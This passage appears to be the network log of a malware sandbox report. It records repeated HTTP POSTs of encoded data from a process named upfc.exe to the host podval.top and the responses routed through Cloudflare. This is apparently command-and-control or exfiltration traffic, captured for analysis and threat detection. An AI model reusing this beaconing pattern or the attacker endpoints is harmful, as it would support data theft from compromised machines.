                                                    Data Ascii: ZWZ_^_WQXVUQPYYZUP^YQUSXSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!29(C$) %0 *-S#-"9=X$![3+;'Y72[8,"['$Y
                                                    Jul 3, 2024 16:42:36.655148983 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:36.856863022 CEST | 588 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:36 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O1VS3ZJ%2BVA4orlRxyy1pvi0WDEeRb%2BxCa%2FoyFJfcCFiZanU39GbcZfJkYXpMmnyii6Fe%2F9QueQf%2FJr1SYRrJrfOowRN76zaOuKvkSGq6aFa0W4V%2BKskYT%2B6CJe4i"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4a2cf267ce2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    35 | 192.168.2.10 | 49752 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:42:37.111917973 CEST | 270 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:42:37.467463017 CEST | 1060 | OUT | Data Raw: 5f 52 5a 5f 5b 59 52 5b 58 56 55 51 50 5b 59 51 55 5a 5e 5c 51 5c 53 5e 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _RZ_[YR[XVUQP[YQUZ^\Q\S^SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!&_ E3$'0>!T7=9:=$!X%0/W;#7;<"['$Y -
                                                    Jul 3, 2024 16:42:37.595010042 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:37.930494070 CEST | 582 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:37 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IBPs4AXAUdvDH64UiA6IIKwgY%2B3YiQzUnAi1CWMoBIafrZ3YpbkDmdZV7Z9BZG44jX%2FW6z8l%2BpMdRaspgc0QHrN46VJgIjRTJIw5foyw26%2FHESDTWdcz6vJHkAIR"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4a8adec4326-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    36 | 192.168.2.10 | 49753 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:42:38.063424110 CEST | 270 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:42:38.416501999 CEST | 1060 | OUT | Data Raw: 5f 53 5f 5a 5e 5f 57 5b 58 56 55 51 50 5d 59 52 55 5c 5e 5f 51 5f 53 5d 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _S_Z^_W[XVUQP]YRU\^_Q_S]SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!%93&)?$ 3=.5U -%\.$&)'U7W8.#Z7"?/<"['$Y 5
                                                    Jul 3, 2024 16:42:38.530325890 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:38.865123034 CEST | 575 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:38 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VhI3kSLBEpF6Na5PKKJHpborsOamnQdpoHq6LldssbIRS9%2BIvX53L3VQlKAGuy6o2c68hpcmlLtiFAVIi2V9hdHmzEd9FP96bgiVI0JzM4lJRsEfHeHu9d%2FCEEY%2F"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4ae8c980f9c-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a
                                                    Data Ascii: 4;R\P
                                                    Jul 3, 2024 16:42:38.955540895 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    37 | 192.168.2.10 | 49754 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:42:39.079619884 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:39.432176113 CEST | 1060 | OUT | Data Raw: 5a 50 5a 5e 5b 58 57 5e 58 56 55 51 50 5c 59 52 55 58 5e 58 51 54 53 5d 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZPZ^[XW^XVUQP\YRUX^XQTS]SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"]2:'$9,'#7Z)=. ->9==]35%#<8#78_;"['$Y 1
                                                    Jul 3, 2024 16:42:39.539979935 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:39.756047964 CEST | 571 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:39 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7lb6N8AO9jSTDbpdV%2FR9pbn8eG4eFTjMUWl8r1UOnhfMoDBcGQTR0YoF6rR5tsUzdMIs5CdFmHRWVGuaj1sdqGvCyzusMtzgARKKr5Vr5o0XqRmiBmnfvsZPtnfd"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4b4db8672c2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a
                                                    Data Ascii: 4;R\P
                                                    Jul 3, 2024 16:42:39.847882986 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    38 | 192.168.2.10 | 49755 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:42:40.011636019 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:40.369752884 CEST | 1060 | OUT | Data Raw: 5f 5b 5f 59 5b 5d 57 5c 58 56 55 51 50 5b 59 5a 55 5c 5e 58 51 54 53 57 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _[_Y[]W\XVUQP[YZU\^XQTSWSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!19$@0$'07Z*-97>*9!36)X38._"!(X;"['$Y -
                                                    Jul 3, 2024 16:42:40.477041006 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:40.822596073 CEST | 586 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:40 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZHJ8OSxFoGloNrX7uL%2FdP3JwMyFEdbnFh8WSmEKPNJa0%2F16Zb%2Bgplbm5DPrym02SxP%2Bc6P7CDXvZvhaj44k%2Bjl5kNQkT%2F263dM6RXxflwYVZ2Rr8Lq9ahSPTV7Vk"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4baba0b43be-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    39 | 192.168.2.10 | 49756 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:42:40.962743044 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:41.307719946 CEST | 1060 | OUT | Data Raw: 5f 55 5a 5c 5b 5d 57 58 58 56 55 51 50 5d 59 5a 55 5d 5e 5c 51 59 53 59 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _UZ\[]WXXVUQP]YZU]^\QYSYSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!2)#'8'#]>=2#[6-$%"$(/<"2Y8,"['$Y 5
                                                    Jul 3, 2024 16:42:41.429552078 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:41.761842012 CEST | 580 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:41 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GXkTTPYhHPrz2BU8MU2JylqbkQLG68EDebRduXzL2mkdhPmF%2FAaGSXrnin2PVRk2gr7ElQ%2BQrSadaP5UEr61PUFjPobhOof7KN7SLBQif881IQ9J6dB%2FgTRNWtTZ"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4c09d5b80e2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    40 | 192.168.2.10 | 49757 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:42:41.879108906 CEST | 293 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 500
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:42.229017973 CEST | 500 | OUT | Data Raw: 5f 53 5f 5d 5e 58 57 5b 58 56 55 51 50 50 59 5b 55 5c 5e 5a 51 59 53 59 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _S_]^XW[XVUQPPY[U\^ZQYSYSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"X')3&)'Y000>R!-5[:&&%63T/.+^7!8Z/<"['$Y
                                                    Jul 3, 2024 16:42:42.368227005 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:42.707231045 CEST | 580 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:42 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5w303Wcw8le0znRLHVjXsPBdLgUrn1JEEiyJsAR3Ga%2BO0YTdlS33SkOIPSUNewVhEfwV%2FyQesZsdtwQe8tnG6hzzjNOm6%2BXfvOXzcHDAcVq74r37wO5cO0YXLMB4"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4c67e9a19bf-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                    41          192.168.2.10  49758        188.114.97.3    80                6960  C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp                            Bytes transferred  Direction  Data
                                                    Jul 3, 2024 16:42:41.894560099 CEST  294                OUT        POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:42.244633913 CEST  1060               OUT        Data Raw: 5f 5b 5f 59 5b 5b 57 58 58 56 55 51 50 58 59 5a 55 51 5e 5e 51 54 53 5f 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _[_Y[[WXXVUQPXYZUQ^^QTS_SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"'9<A&*7X'V;](.57=*.X$5'+W-.,4/"['$Y !
                                                    Jul 3, 2024 16:42:42.374855042 CEST  25                 IN         HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:42.732168913 CEST  578                IN         HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:42 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=81iSGSres326gyTc9vUN%2BGV4sTR4vswsPZYeikGF9CuuoWiNiBxfapd7nh8ImIlXCLHeWroUMOOeWnAvjV6K5jfE0XBPeydcerKbXIl5cd%2FofRgWc3RWrAYpY3iC"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4c688a842c4-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                    42          192.168.2.10  49759        188.114.97.3    80                6960  C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp                            Bytes transferred  Direction  Data
                                                    Jul 3, 2024 16:42:42.565844059 CEST  270                OUT        POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue


                                                    Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                    43          192.168.2.10  49760        188.114.97.3    80                6960  C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp                            Bytes transferred  Direction  Data
                                                    Jul 3, 2024 16:42:42.860985041 CEST  270                OUT        POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1056
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:42:43.213357925 CEST  1056               OUT        Data Raw: 5f 56 5f 59 5b 5c 57 51 58 56 55 51 50 59 59 57 55 5e 5e 54 51 5c 53 5d 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _V_Y[\WQXVUQPYYWU^^TQ\S]SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"\%$@':#$'*.&7::>='%X00,X84/"['$Y 5
                                                    Jul 3, 2024 16:42:43.326652050 CEST  25                 IN         HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:43.668684959 CEST  584                IN         HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:43 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m3srYyKT%2FdzhKLD5%2BMR4pKfOdbff7%2Fx2FzL5ToQ1FoNCzgN6X3gCc3zVx4vlkjLxAtdqJMNX57XUPPd3Pxvs%2BdkUAelXqi9Me040u2DszRDJbQunaed3%2FCKdBHLU"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4cc781b0cc6-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                    44          192.168.2.10  49761        188.114.97.3    80                6960  C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp                            Bytes transferred  Direction  Data
                                                    Jul 3, 2024 16:42:43.797420979 CEST  294                OUT        POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:44.150860071 CEST  1060               OUT        Data Raw: 5a 55 5f 55 5e 5c 52 5f 58 56 55 51 50 5d 59 51 55 5f 5e 55 51 5f 53 5b 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZU_U^\R_XVUQP]YQU_^UQ_S[SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"Y10D$;_' 4(=94.9[--$&$(-- 7!+,"['$Y 5
                                                    Jul 3, 2024 16:42:44.283164024 CEST  25                 IN         HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:44.621587992 CEST  582                IN         HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:44 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bj%2BBlQkLS9O6bLVqFBYFqFK%2F0NFHSp8FNrZTnM0igVTQlSzA5XnIHSEgOelOFrjUuXbIhRJCGplDDKyvW6TpEmPsUTwsW%2F4WwPTA5alcoIlsGfa7M1Ja1efrHqkt"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4d27c398cc8-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                    45          192.168.2.10  49762        188.114.97.3    80                6960  C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp                            Bytes transferred  Direction  Data
                                                    Jul 3, 2024 16:42:44.768712997 CEST  270                OUT        POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:42:45.128559113 CEST  1060               OUT        Data Raw: 5f 5b 5f 59 5b 58 52 5b 58 56 55 51 50 51 59 52 55 5a 5e 55 51 5d 53 58 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _[_Y[XR[XVUQPQYRUZ^UQ]SXSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"'9(0'$0$=.-S#>-:30#U/>8#!8Y8,"['$Y
                                                    Jul 3, 2024 16:42:45.243262053 CEST  25                 IN         HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:45.583950043 CEST  578                IN         HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:45 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
